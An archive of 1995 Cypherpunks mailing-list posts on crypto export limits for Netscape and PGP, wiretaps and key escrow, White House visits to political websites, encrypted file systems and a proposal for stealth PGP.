Message-ID: <199509122007.NAA17074@usr3.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


As fast as it takes to FTP it over there.
I have copies of every server Netscape's got,
although I haven't unpacked them or used them.

Will this take up another 75 megs on the HD?

Lover Always,

Carol Anne.....dreaming of her own web server someday.

>| Meanwhile, in an as yet unannouced move, the company said it would place 
>| its commercial browser online for free downloading. [..] THe commercial
>| version, sold only in the U.S. contains an unbreakable 128-bit
>| encryption scheme. 

>Ok, any bet on how long it will take?
>
>/Christian
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Tue, 12 Sep 95 13:25:26 PDT
To: cypherpunks@toad.com
Subject: Secure Device 1.4 (secdr14.zip)
Message-ID: <199509122327.SAA25529@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


Dear fellow Cypherpunks, Could someone send me Secure Device 1.4 
(Secdr14.zip) ? My ftp software won't accept the huge directory path needed 
to point at the package on U.S. servers. I am an American citizen at an 
American site who knows the export regulations. Thank You, Gary Jeffers





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 12 Sep 95 15:48:37 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape to patch shareware version
Message-ID: <199509122248.PAA21902@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 9/12/95 +0200, you wrote:
>>| Netscape said it received word last week that the State Department had 
>>| cleared that version for release on the Net, but only within the U.S., 
>>| owing to current export laws banning the export of encryption schemes 
>>| stronger than 40 bits.  THe company could provide no details by press 
>>| time on how it would ensure that the 128-bit version wouldn't leak beyond 
>>| U.S. borders.
>>
>>Ok, any bet on how long it will take?
>
>It's already been exported.  Evidently, one of those who bought the
commercial >version sent it to Europe as soon as it was out.

The Netscape "personal edition" was available in Europe on some store
shelves soon after it's release.  (The PE edition of netscape has the 128
bit encryption.)

As for what Netscape will do in this case...  They had made plans to release
the 128 bit version in a method similar to what MIT uses, but they found
that they could actually get people to buy a copy if they kept that one as
only available by ordering it.  (Who says that people will not pay for
encryption?)  Now all they need to do is come out with a version with a
bigger key. (Hint, hint...)

I will keep my personal feelings about Netscape to a minimum here.  There
are certain things that they do well and there are others they do not.  But
those problems will continue to be forwarded to Dave Null... 

Well, on to more profitable things.



>
>I note the site removed it, however, probably because Netscape Comm. Inc.
requested that they do so.  Netscape generally objects to anyone else
carrying their browser (.edu sites with prior permission excepted).
>
>
>
>
|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Johnson@Colorado.EDU (Richard Johnson)
Date: Tue, 12 Sep 95 15:06:04 PDT
To: bbruce@csn.net
Subject: Leaked NSI PR About $50-Annual-Fee-for-Domain-Name
Message-ID: <v02130507ac7bae1c3f04@[199.117.100.8]>
MIME-Version: 1.0
Content-Type: text/plain


Here's a pointer to a very interesting draft press release, apparently scheduled for release on 18 September 1995.

Short version:  The article specifies $100 one-time fee for new domain name registrations, and a $50/year annual fee for all .com, .edu, .gov, .net, and .org domains.

Long version:
> From: rpwhite@best.com (rpwhite)
> Newsgroups: best.general,best.announce,best.www,ba.internet,comp.protocols.tcp-ip.domains,talk.bizarre
> Subject: INTERNET BEGINS FEE-BASED REGISTRATION
> Date: 12 Sep 1995 12:18:18 -0700
> Organization: BEST Internet (415) 964-2378
> Lines: 495
> Approved: dillon@best.com
> Message-ID: <434mdq$c3r@shell1.best.com>
> NNTP-Posting-Host: shell1.best.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Tue, 12 Sep 95 16:07:16 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <Pine.D-G.3.91.950912174515.23949C-100000@dg.thepoint.net>
Message-ID: <199509122307.QAA02486@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Brian Davis <bdavis@thepoint.net> writes:
> No question.  Many high profile public corruption, Mafia, and high-level...
> ...In our district, we managed to convict almost 20 people...
> Particularly effective were the court-approved video and audio tapes of...

> I don't doubt that wiretaps may sometimes be abused despite the 
> incredibly onerous review process, but they have positive aspects, too.

In how many of these cases did you fail to get the necessary information
because of encryption?  Has this proportion been changing over the years?

	Jim Gillogly
	Hevensday, 21 Halimath S.R. 1995, 23:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 12 Sep 95 15:27:02 PDT
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, 9/17, 2 pm
Message-ID: <wYgVwkkAsiuL084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As usual, we'll congregate at the food court in the basement of
the Tivoli, near the confluence of Larimer St., Speer Blvd., and
the Auraria Parkway, and perhaps drift off to nearby libraries or
restaurants after an hour or two.  Email for directions or more
info.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: I *swear* I have not used the term 'big-endian' in the last 10 years.

iQCVAwUBMFYHkFRRFMq4NZY5AQGuGwQAmOqG0gpZHlUsmQxHcCfA2Hg30LQH9FXN
xgz+gZuMWLFDNIZp/5bmodK18B4NpE4AtJH9QhA8kngb11/onVAu8aiw/EFGbTyT
yHF2NVN20gGOGAYbeJzpUWHnJhPUB9QYszdwc8K0VvDtYfxq/H8mDfgDiGjNenCG
z8ryBpKWYkQ=
=cscS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 12 Sep 95 13:51:22 PDT
To: cypherpunks@toad.com
Subject: Re: GAK/weak crypto rationale?
Message-ID: <199509122051.QAA14953@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by Andrew.Spring@ping.be (Andrew Spring) on 
Tue, 12 Sep  7:3  PM

>A more cautious conclusion would be would be that the 
>importance (to the  LEA's) of the busts made with 
>crypto is much larger than the numbers  suggest.  You 
>could interpret that a lot of ways:  I suspect that  
>high-profile career-enhancing cases are highly 
>dependent on wiretaps.


   In response to an audience question about wiretaps and
   crypto, Mr. Michael Nelson of the White House said at the
   NIST GAK meeting (paraphrased):

      We are not concerned with bad people using crypto among
      themselves, we can handle that. We are more concerned
      with their using crypto to communicate with regular
      folks, to make legitimate arrangements -- finance,
      supplies, travel, and so on -- for their nefarious
      deeds. It's the intermix of the bad with the good that's
      the problem.

   Maybe someone else at the meeting heard this differently
   and will comment, but this seems to mean that the Feds can
   track, and maybe crack, the crypto-intercomm of "bad
   people" so long as it is not buried in a torrent of public
   crypto use. And not commingled with lawful, ECPA-
   protected(?), communication.

   Anybody want to elaborate what Mr. Nelson was implying
   about wiretaps and crypto?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Tue, 12 Sep 95 08:27:12 PDT
To: cypherpunks@toad.com
Subject: Re: Elliptic Curve Public Key Crypto available
Message-ID: <9509121500.AA03172@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



Available anywhere outside the escrowed country ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Tue, 12 Sep 95 15:13:00 PDT
To: Tom Rollins <kelso@netcom.com>
Subject: Re: Scientology tries to break PGP - and (fwd)
In-Reply-To: <199509122056.NAA19963@netcom19.netcom.com>
Message-ID: <Pine.SUN.3.90.950912170953.15984A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


In that case you must try CFS or Cryto File Sytem. Not implemented in a 
partition or in the kernel like SFS but as a user level loopback nfs server.
Its quite nice.

Aleph One / aleph1@dfw.net
http://underground.org/

On Tue, 12 Sep 1995, Tom Rollins wrote:

> Date: Tue, 12 Sep 1995 13:56:18 -0700 (PDT)
> From: Tom Rollins <kelso@netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: Scientology tries to break PGP - and (fwd)
> 
> > 	I would just like to point out that, when a LEA comes to you
> > to get at the contents of your computer, (s)he is not going to
> > patiently wait while your system wipes the offending evidence off your
> > hard disk.  The first thing they do is make a copy of everything, so
> > they can work from the copy.  Besides, you do have backup tapes laying
> > around all over the place, don't you?
>  
> Sounds like a recomendation for SFS (Secure File System).
> It encryppts everything going to the disk.
> I used an SFS partition for a while.  But, I swap between
> DOS and Linux.  Havn't seen SFS for linux yet.
>  
> Later,
> Tom <kelso@netcom.com>
>  
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Tue, 12 Sep 95 10:50:29 PDT
To: cypherpunks@toad.com
Subject: Whitehouse "dissident" web site monitoring?
Message-ID: <9509121717.AA03226@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



- ----------------------------------------------------------

      WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET


    The  National  Security   Agency   presumably   can   monitor
subversive  communication  on  the  Internet  without leaving any
trace  by  "sniffing  packets"  at  traffic  nodes.  For   purely
political  purposes, however, the White House may be forced to do
the monitoring in-house,  which  means  that  they  leave  traces
everywhere they go.

    With  just  a  superficial  search  for  such   traces,   The
Washington   Weekly   has   uncovered   intensive  monitoring  of
"dissident" Internet sites by the White House.

    It turns out that computers from inside the White House  have
kept  pretty  good  tabs  on information available on Whitewater,
Vince Foster, and Mena at a few key repositories  on  the  World-
Wide Web, a subset of the Internet.

    Just  three  such  sites:  "The   Washington   Weekly,   "The
Whitewater  Scandal  Home  Page" and "Whitewater & Vince Foster,"
were accessed 128 times by  four  computers  from  the  Executive
Office  of the President between August 28 and August 31.  If the
White House is showing a similar interest in other sites  on  the
World  Wide  Web,  that would amount to a monitoring operation of
considerable magnitude. Tim Brady of the  Yahoo!  World-Wide  Web
index  says  that his company alone has indexed approximately 725
political  sites.  That  monitoring  effort  would  be   nothing,
however,  compared  to  the  effort  required to follow all anti-
Clinton discussion on the Usenet, another subset of the Internet.

    The White House did  not  respond  to  an  inquiry  (attached
below)   asking  for  an  explanation  and  asking  whether  this
constituted "casual browsing."

    Interestingly, the week after the  White  House  snooping  of
files,  which included a series of articles by J. Orlin Grabbe on
Vince Foster's ties  to  the  NSA,  the  following  little  piece
appeared in Newsweek Magazine:

  "Conspiracy theorists perked up when Deborah Gorham told Senate
  Whitewater investigators in June that her boss, the late deputy
  White House counsel Vince Foster, asked her  to  put two secret
  notebooks  from  the  National Security Agency in a White House
  safe. The suggestion that  Foster  dealt  with  the NSA sparked
  feverish  speculation  on the  Internet that he was involved in
  espionage. The reality appears more prosaic.  The  White  House
  won't give details,  but  sources say Foster's files dealt with
  legal questions about national emergencies...."


    Does the White House follow anti-Clinton discussion on Usenet
newsgroups just as closely?  The White House posts press releases
to Usenet in collaboration with the Artificial  Intelligence  Lab
at   Massachusetts   Institute  of  Technology.  But  MIT  System
Administrator Bruce Walton says that the White House does not use
the  same  server  for  reading netnews.  It would be difficult -
although not impossible - to find the server that the White House
uses  for  reading  or  receiving netnews and check for traces on
that server.

    Readers may be tempted to post a threat to the President on a
newsgroup just to see if they get a visit from the Secret Service
the next day. That experiment is not advisable. It is a  criminal
offense.  But  Usenet  just might be a faster conduit for getting
the attention of the administration than the email  address  that
the White House has published for the president.





Attachment:



                      THE WASHINGTON WEEKLY
_________________________________________________________________

August 31, 1995

Virginia M. Terzano
White House Office of the Press Secretary
The White House


Dear Ms. Terzano:

    It has come to my attention that several dissident  sites  on
the  World  Wide  Web  have been visited by White House computers
this week.  Apparently,  all  information  regarding  Whitewater,
Foster, and Mena has been transferred to White House computers.

    Specifically, the sites,  

"Washington Weekly" (http://www.federal.com),  
"The Whitewater Scandal Home Page"
(http://www.cs.dartmouth.edu/~crow/whitewater/)
"Whitewater & Vince Foster" 
(http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html)

have  been  visited  by  White  House   computers   ist1.eop.gov,
ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
28 and August 31, and a total of 128 files have been  transferred
to those White House computers. For all sites, this constitutes a
significant  increase  over  previous  access  by   White   House
computers.

    In light of this information, I have the following questions:

(1) Does this constitute "casual browsing" by White House staff, or
    is it, in light of the considerable time and effort spent during 
    regular business hours, part of a monitoring or intelligence operation?

(2) For what purpose is the information transferred to the White House used?

(3) Does the White House keep information from these web sites on file,
    and does the White House keep a file on the persons responsible for
    these web sites?

(4) Is the April 9 statement by David Lytel of the White House Office of
    Science and Technology to Amy Bauer of Copley News Service that the
    administration does not monitor anti-Clinton activity on the web still
    operative?


    Thank you very much for your cooperation in this matter.

Sincerely,

Marvin Lee
The Washington Weekly




Copyright (c) 1995 The Washington Weekly (http://www.federal.com)


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an215712@anon.penet.fi
Date: Tue, 12 Sep 95 11:06:11 PDT
To: cypherpunks@toad.com
Subject: Whitehouse responds to Zimmermann pardon letter
Message-ID: <9509121750.AA19433@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 14:45:29 PDT
To: Andrew Spring <Andrew.Spring@ping.be>
Subject: Re: GAK/weak crypto rationale?
In-Reply-To: <v01510100ac7a4e673a66@[193.74.217.13]>
Message-ID: <Pine.D-G.3.91.950912174515.23949C-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Andrew Spring wrote:

> >intercepts requested and authorized in the past year.  As I recall, the
> >number was quite small - around 12K [?].  Someone had found this out
> >through an FOIA request, perhaps, (my recollection of it is poor). It was
> 
> I think it's about 1200.
> 
> >not a large number, anyway.  I must conclude that the actual number of
> >intercepts is much, much larger than they are saying, and that they must
> >be getting what they perceive to be good intel from all this snooping.
> >
> 
> A more cautious conclusion would be would be that the importance (to the
> LEA's) of the busts made with crypto is much larger than the numbers
> suggest.  You could interpret that a lot of ways:  I suspect that
> high-profile career-enhancing cases are highly dependent on wiretaps.

No question.  Many high profile public corruption, Mafia, and high-level 
narcotics trafficking cases are made with wiretaps.  In our district, we 
managed to convict almost 20 people in an investigation of the state 
legislature, including the now-former Speaker of the House and > 6 other 
legislators.  Bribing lobbyists took hits, etc.

Particularly effective were the court-approved video and audio tapes of 
the Speaker taking a bribe in exchange for certain action on legislation 
and responding to the bribing party:   "Well bless your heart."
That has become the office's mantra.

I understand the same was true of the South Carolina state legislature 
investigation (wiretaps). 

A number of previous investigations of our legislature failed over the 
past 15 years as the stonewall held.  Wiretaps, hidden microphones, and 
hidden cameras put corrupt politicians (I know - redundant) out of business.

I don't doubt that wiretaps may sometimes be abused despite the 
incredibly onerous review process, but they have positive aspects, too.

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 17:39:33 PDT
To: Peter Trei <trei@process.com>
Subject: Re: Digital Fingerprinting
In-Reply-To: <9509121745.AA19687@toad.com>
Message-ID: <Pine.D-G.3.91.950912175508.23949D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995, Peter Trei wrote:

> > Finding the mail mixed in there is evidence that supports the "charge" 
> > but surely can be rebutted.  When I was practicing in a small town c. 
> > 1984, people would be summoned (sent a paper telling them to show up) to 
> > court for illegal dumping if their mail was found with other trash, old 
> > refrigerators, etc., in a creek somewhere.  Those charged could always 
> > put on proof that Billy Bob's garbage service picked up their trash ...
> 
> > The sentence was almost always to go and pick up some multiple of the 
> > garbage found and take it to the landfill.
> 
> This was Stockbridge, in MA, right :-?

No, it was in Western Kentucky with a week or two of a family's garbage 
and maybe a worn out appliance or two.  No garbage pickup provided by the 
county; private haulers expensive; dropping much at the landfill both 
inconvenient and "unnecessary" given the availability of hard to find 
valleys and creeks.

EBD

 
> 	        That's what we did, and drove back to the church, had a
> 	thanksgiving dinner that couldn't be beat, went to sleep and didn't
> 	get up until the next morning, when we got a phone call from officer
> 	Obie.  Said "Kid, we found your name on an envelope at the bottom of a
> 	half a ton of garbage, and just wanted to know if you had any
> 	information bout it". I said "Yes Sir Officer Obie, I cannot tell a
> 	lie, I put that envelope under that garbage."
> (c) Arlo Guthrie
> 
> 
>  
> 
> Peter Trei
> Senior Software Engineer
> Purveyor Development Team                                
> Process Software Corporation
> http://www.process.com
> trei@process.com
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 12 Sep 95 18:03:49 PDT
To: cypherpunks@toad.com
Subject: Re: Whitehouse "dissident" web site monitoring?
Message-ID: <ac7b776f120210047e03@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



I strongly agree with the views of  Phill Hallam-Baker and Brian Davis, and
perhaps others who make the same points, that access by the White House to
the various Web sites is NO BIG DEAL.

I go further: I have no concerns about the NSA reading _this_ list! After
all, it's a public list, so all are free to read it. Also, it may be very
useful for the Feds to be seeing what we are arguing.

We don't believe in "security through obscurity," do we? The notion that we
are "safe" if the White House, or (horrors!) Janet Reno herself, are not
reading our list or the Web sites on various issues, is the same kind of
security the ostrich thinks he has with his head in the sand and his butt
in the air.

If you want to be unheard by the Feds, and the White House, and the FBI,
and GCHQ, and Mossad, etc., then don't post publically. If you want your
own access to Web sites kept private, push for the development of Web
proxies ("Web remailers").

And so forth. Security is in our own hands, as it should be (and as
"complex mathematics" has made it).

(In the U.S. and most Western countries--actually, an increasing number of
countries, worldwide--it is not easy to prosecute and convict a citizen for
mere views expressed, or for reading preferences, etc.. Although I am
thought of as a "crypto anarchist," and basically am such a thing, the fact
is that there aren't a lot of trials for thoughtcrime in this country. I
have some doubts about the circumstances surrounding Danny Casolaro's
death, though, so I don't say all is rosy and perfect. I just say that
paranoia that the White House or the FBI is reading public items is
unwarranted.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Sep 95 14:56:35 PDT
To: an215712@anon.penet.fi
Subject: Re: Whitehouse "dissident" web site monitoring?
In-Reply-To: <9509121717.AA03226@anon.penet.fi>
Message-ID: <Pine.D-G.3.91.950912180024.23949E-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 12 Sep 1995 an215712@anon.penet.fi wrote:

> 
> - ----------------------------------------------------------
> 
>       WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET
>       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^!!!

Unbelievable!!!  To add to this distressing truth, I have learned that 
the White House also subscribes to a number of newspapers and periodicals 
which are reviewed for things of interest to the Administration and to 
the President. I I I I I I ammmmmmmmmm shocked!


Ooops.  Dog bites man.
And do you really think the White House couldn't hire a couple of net 
gurus to sniff packets if they wanted to hide their "monitoring"(=reading).

EBD
 
> 
>     The  National  Security   Agency   presumably   can   monitor
> subversive  communication  on  the  Internet  without leaving any
> trace  by  "sniffing  packets"  at  traffic  nodes.  For   purely
> political  purposes, however, the White House may be forced to do
> the monitoring in-house,  which  means  that  they  leave  traces
> everywhere they go.
> 
>     With  just  a  superficial  search  for  such   traces,   The
> Washington   Weekly   has   uncovered   intensive  monitoring  of
> "dissident" Internet sites by the White House.
> 
>     It turns out that computers from inside the White House  have
> kept  pretty  good  tabs  on information available on Whitewater,
> Vince Foster, and Mena at a few key repositories  on  the  World-
> Wide Web, a subset of the Internet.
> 
>     Just  three  such  sites:  "The   Washington   Weekly,   "The
> Whitewater  Scandal  Home  Page" and "Whitewater & Vince Foster,"
> were accessed 128 times by  four  computers  from  the  Executive
> Office  of the President between August 28 and August 31.  If the
> White House is showing a similar interest in other sites  on  the
> World  Wide  Web,  that would amount to a monitoring operation of
> considerable magnitude. Tim Brady of the  Yahoo!  World-Wide  Web
> index  says  that his company alone has indexed approximately 725
> political  sites.  That  monitoring  effort  would  be   nothing,
> however,  compared  to  the  effort  required to follow all anti-
> Clinton discussion on the Usenet, another subset of the Internet.
> 
>     The White House did  not  respond  to  an  inquiry  (attached
> below)   asking  for  an  explanation  and  asking  whether  this
> constituted "casual browsing."
> 
>     Interestingly, the week after the  White  House  snooping  of
> files,  which included a series of articles by J. Orlin Grabbe on
> Vince Foster's ties  to  the  NSA,  the  following  little  piece
> appeared in Newsweek Magazine:
> 
>   "Conspiracy theorists perked up when Deborah Gorham told Senate
>   Whitewater investigators in June that her boss, the late deputy
>   White House counsel Vince Foster, asked her  to  put two secret
>   notebooks  from  the  National Security Agency in a White House
>   safe. The suggestion that  Foster  dealt  with  the NSA sparked
>   feverish  speculation  on the  Internet that he was involved in
>   espionage. The reality appears more prosaic.  The  White  House
>   won't give details,  but  sources say Foster's files dealt with
>   legal questions about national emergencies...."
> 
> 
>     Does the White House follow anti-Clinton discussion on Usenet
> newsgroups just as closely?  The White House posts press releases
> to Usenet in collaboration with the Artificial  Intelligence  Lab
> at   Massachusetts   Institute  of  Technology.  But  MIT  System
> Administrator Bruce Walton says that the White House does not use
> the  same  server  for  reading netnews.  It would be difficult -
> although not impossible - to find the server that the White House
> uses  for  reading  or  receiving netnews and check for traces on
> that server.
> 
>     Readers may be tempted to post a threat to the President on a
> newsgroup just to see if they get a visit from the Secret Service
> the next day. That experiment is not advisable. It is a  criminal
> offense.  But  Usenet  just might be a faster conduit for getting
> the attention of the administration than the email  address  that
> the White House has published for the president.
> 
> 
> 
> 
> 
> Attachment:
> 
> 
> 
>                       THE WASHINGTON WEEKLY
> _________________________________________________________________
> 
> August 31, 1995
> 
> Virginia M. Terzano
> White House Office of the Press Secretary
> The White House
> 
> 
> Dear Ms. Terzano:
> 
>     It has come to my attention that several dissident  sites  on
> the  World  Wide  Web  have been visited by White House computers
> this week.  Apparently,  all  information  regarding  Whitewater,
> Foster, and Mena has been transferred to White House computers.
> 
>     Specifically, the sites,  
> 
> "Washington Weekly" (http://www.federal.com),  
> "The Whitewater Scandal Home Page"
> (http://www.cs.dartmouth.edu/~crow/whitewater/)
> "Whitewater & Vince Foster" 
> (http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html)
> 
> have  been  visited  by  White  House   computers   ist1.eop.gov,
> ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
> 28 and August 31, and a total of 128 files have been  transferred
> to those White House computers. For all sites, this constitutes a
> significant  increase  over  previous  access  by   White   House
> computers.
> 
>     In light of this information, I have the following questions:
> 
> (1) Does this constitute "casual browsing" by White House staff, or
>     is it, in light of the considerable time and effort spent during 
>     regular business hours, part of a monitoring or intelligence operation?
> 
> (2) For what purpose is the information transferred to the White House used?
> 
> (3) Does the White House keep information from these web sites on file,
>     and does the White House keep a file on the persons responsible for
>     these web sites?
> 
> (4) Is the April 9 statement by David Lytel of the White House Office of
>     Science and Technology to Amy Bauer of Copley News Service that the
>     administration does not monitor anti-Clinton activity on the web still
>     operative?
> 
> 
>     Thank you very much for your cooperation in this matter.
> 
> Sincerely,
> 
> Marvin Lee
> The Washington Weekly
> 
> 
> 
> 
> Copyright (c) 1995 The Washington Weekly (http://www.federal.com)
> 
> 
> ----------------------------------------------------------------------------
> To find out more about the anon service, send mail to help@anon.penet.fi.
> If you reply to this message, your message WILL be *automatically* anonymized
> and you are allocated an anon id. Read the help file to prevent this.
> Please report any problems, inappropriate use etc. to admin@anon.penet.fi.
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous Remailing Service <nobody@armadillo.com>
Date: Tue, 12 Sep 95 16:22:50 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509122323.SAA23651@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain


E. Brian sed:


>Unbelievable!!!  To add to this distressing truth, I have learned that 
>the White House also subscribes to a number of newspapers and periodicals 
>which are reviewed for things of interest to the Administration and to 
>the President. I I I I I I ammmmmmmmmm shocked!

mebbe tha Slickster just wants to know who orlin's "Deep Throat" is...
Keep checkin' them fingerprints, Willie!

>Ooops.  Dog bites man.
>And do you really think the White House couldn't hire a couple of net 
>gurus to sniff packets if they wanted to hide their "monitoring"(=reading).

who sez they dont post, too?
heh





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Tue, 12 Sep 95 10:33:50 PDT
To: gjeffers@socketis.net
Subject: Re: Returned mail: User unknown
In-Reply-To: <199509121728.SAA16313@hermes>
Message-ID: <26561.9509121731@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



[whoops mispelled cpunks on cc line 1st time, sorry for 2 copies]

Perry Metzger <perry@piermont.com> wrote:
> Gary Jeffers <gjeffers@socketis.net> writes:
> >    Well, I just used MIT's PGP 2.6.2 with 3 different users' public
> > keys to encrypt 3 different files. In all 3 files, the first 3
> > characters were the same (an umlauted A, then an i with an up arrow
> > over it, and then a heart). This beginning 3 character string is
> > apparently the infamous PGP RSA signature. The signature that says
> > to spooks' programmed encryption sniffers - "HEY! I'M PGP -  GIVE ME
> > A LOOK!."
> 
> As if they couldn't figure it out anyway. It isn't an "RSA signature"
> by the way. Read format.doc sometime.

Yeah, that's what stealth does, removes the boiler plate stuff saying,
various things, such as pgp version number, rsa encrypted message,
conventional idea block, and as Perry says, it's all in pgformat.doc
in the PGP docs directory.

> >    When are the PGP designers and coders going to get serious and de-
> > velope STEALTH PGP inside PGP itself!?
> 
> Never, I hope. It would dramatically lower the utility of the
> system. Can you imagine how disgusting it would be to try decrypting
> something if you have a dozen keys outstanding? Not to mention how
> hard it would be to deal with figuring out that you should even try to
> decrypt things in the first place.

I reckon it would be a very nice utility, built into pgp as an
*option*, some countries it isn't legal to use PGP, and it hasn't been
ruled out that the US may not be the next to join the list, all this
GAK stuff, son of Clipper, it is a distinct possibility that the law
enforcement lot might outlaw other crypto wiht mandatory GAK.  Then
stealth features for PGP become important for incorporating into
stego, of course you can argue that well stealth should be part of the
stego app then.  It shouldn't be a problem unless it was enforced, as
an option I see no problem with it, and lots of possible future
advantages even.

I'm trying to work on stealth2.1, modifing Henry Hastur's stealth util
to added Hal Finney's algorithm for improving the stealthiness (it's
not enough to just strip the headers as stealth1.x does, the fact that
the RSA encrypted header is always < N, the rsa modulus gives the game
away with a few messages to analyse for statistical purposes, ie if
you see a lot messages < N, where N is by definition not an even power
of 2, and possibly even N is known, or suspected from keyservers).

I've been delaying releasing it because I was worrying about ran no
generators being good enough, but I think I might have convinced
myself that it is not even necessary to use ran no generators, I'd
appreciate it if some folks with a bit of crypto expertise could cast
their eye over the description below.

> >   So what, -that "only a few companies" will be discovered to be using PGP
> > through the RSA signature!? Those few companies are the seeds for the
> > vast numbers of companies that would follow them in using PGP over the
> > Internet. The RSA signature is the flag that allows the spooks to easily
> > net the bold first companies. The RSA signature is greatly impeding the
> > spread of PGP use over the Internet. PGP MUST BE STEALTHED!!
> 
> It isn't an RSA signature. Its a bunch of magic numbers.
> 
> Look, get real already. If someone sees a bunch of random numbers in
> mail sent by me, its going to be pretty obvious what the hell is
> inside anyway.

Yeah, but you wouldn't do it that way.  I reckon this is what you'd do:

% pgp -es duress
% pgp -es msg
